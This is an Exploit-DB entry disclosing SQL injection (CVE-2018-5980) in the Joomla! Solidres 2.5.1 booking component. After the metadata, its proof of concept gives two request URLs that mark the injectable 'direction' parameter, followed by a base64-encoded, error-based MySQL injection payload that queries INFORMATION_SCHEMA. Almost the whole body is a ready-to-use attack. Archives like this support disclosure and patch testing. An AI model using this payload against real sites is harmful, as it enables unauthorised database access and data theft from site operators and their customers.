Joomla! Component Solidres 2.5.1 - SQL Injection

EDB-ID:

44128




Platform:

PHP

Date:

2018-02-16


# # # # 
# Exploit Title: Joomla! Component Solidres 2.5.1 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://solidres.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/solidres/
# Version: 2.5.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5980
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php/en/component/solidres/?location=&checkin=2018-01-08&checkout=2018-01-09&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=0&option=com_solidres&task=hub.search&start=0&Itemid=306&9f3d70a896d5f1332174599ecac43607=1&ordering=score&direction=desc[SQL]&type_id=12
# 
# http://localhost/[PATH]/index.php/en/component/solidres/?checkin=2018-01-08&checkout=2018-01-09&option=com_solidres&task=hub.search&direction=desc[SQL]
# 
# LChTRUxFQ1QgNDU2MSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHg3MTYyNmE3MTcxLChTRUxFQ1QgKEVMVCg0NTYxPTQ1NjEsMSkpKSwweDcxNmI3MDYyNzEsRkxPT1IoUkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLlBMVUdJTlMgR1JPVVAgQlkgeClhKQ==
# 
# # # #